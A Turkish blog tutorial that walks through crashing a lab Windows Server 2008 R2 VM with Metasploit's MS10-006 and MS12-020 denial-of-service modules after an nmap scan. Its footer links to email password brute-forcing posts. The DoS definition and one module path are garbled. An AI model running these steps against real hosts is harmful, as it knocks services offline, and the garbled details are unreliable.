Windows 7/Server 2008 R2 DOS Saldırısı ( Hacking )

Öncelikle Metasploit ve DOS Nedir ?

METASPLOIT ; Metasploit, çeşitli pentestler gerçekleştirmek için içerisinde exploitler, payloadlar, auxiliaryler ve encoderlerin bulunduğu framework altyapısıdır.
Metasploit; Linux, Windows Mac-OS ortamlarında çalışabilmektedir. Metasploit ile sadece direkt saldırı yapılmaz. çeşitli backdoorlu dosyalar hazırlayıp bunlar ile de hedef sisteme saldırı gerçekleştirebilirsiniz.

DENİAL OF SERVİCE ATTACK - DOS ; Denial of Service attack (DoS saldırısı), İnternet üzerinden çok sayıda istemci bilgisayar kullanılarak yapılan bir saldırı çeşididir. Çoğunlukla virüs bulaştırılarak zombi haline getirilen bilgisayarların, bir sunucu bilgisayara eş zamanlı ve mümkün olduğunca çok sayıda istek göndermesi, sunucunun kapasitesinin aşılması sonucunda da hizmet veremez hale getirilmesi ilkesine dayanır.

Başlıyoruz !

Elimizde bir tane sanal Server 2008 R2 var .
Adım 1 : İlk olarak " msfconsole " komutunu yazarak metasploit'i açıyoruz
Adım 2 : Komut satırımız açıldıktan sonra " use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop" diyoruz.

Adım 3 : " show options " diyoruz ve gördüğünüz gibi "SRVHOST" kısmı boş. Oraya bilgisayarımızın ip adresini yazıyoruz.

Adım 4 : "set SRVHOST 192.168.118.130" yazarak " Enter " tuşuna basıyoruz.
Adım 5 : "run" diyoruz.
Adım 6 : Şimdi ise RDP'nin etkin olup olmadığını kontrol etmek için " nmap -sS 192.168.118.128 " komutu ile kurbanın ip adresini yazarak açık portları tarıyoruz. Ve tarama tamamlandı 3389 portu açık bu demek oluyor ki hack işlemine başlıyabiliriz.
Adım 7 : Yeni bir konsol ekranı açarak " msfconsole " yazarak yeni bir metasploit komut satırı açıyoruz ve buraya " use/auxiliary/windows/rdp/ms12_020_maxchannelids" komutunu girerek " show options " diyoruz. Ve gördüğünüz gibi " RHOST " bölümü boş oraya hedef sistemin ip adresini yazıyoruz.
Adım 8 : Ve " set RHOST 192.168.118.128 " .
Adım 9 : Son olarak " run " diyoruz ve hack işlemi başlıyor .
Adım 10 : Hedef sisteme hizmet reddi saldırı yapılmıştır ve crash olmuştur.

Yorumlar

Bu blogdaki popüler yayınlar

MS17-010 Zafiyetiden Faydalanarak Domain Controller Ele Geçirme

Hydra İle BruteForce Attack Yaparak Nasil Hotmail/Gmail/Yahoo Şifreleri Kırılır ( Hacking )

Sızma Testi Senaryosu - Bölüm 1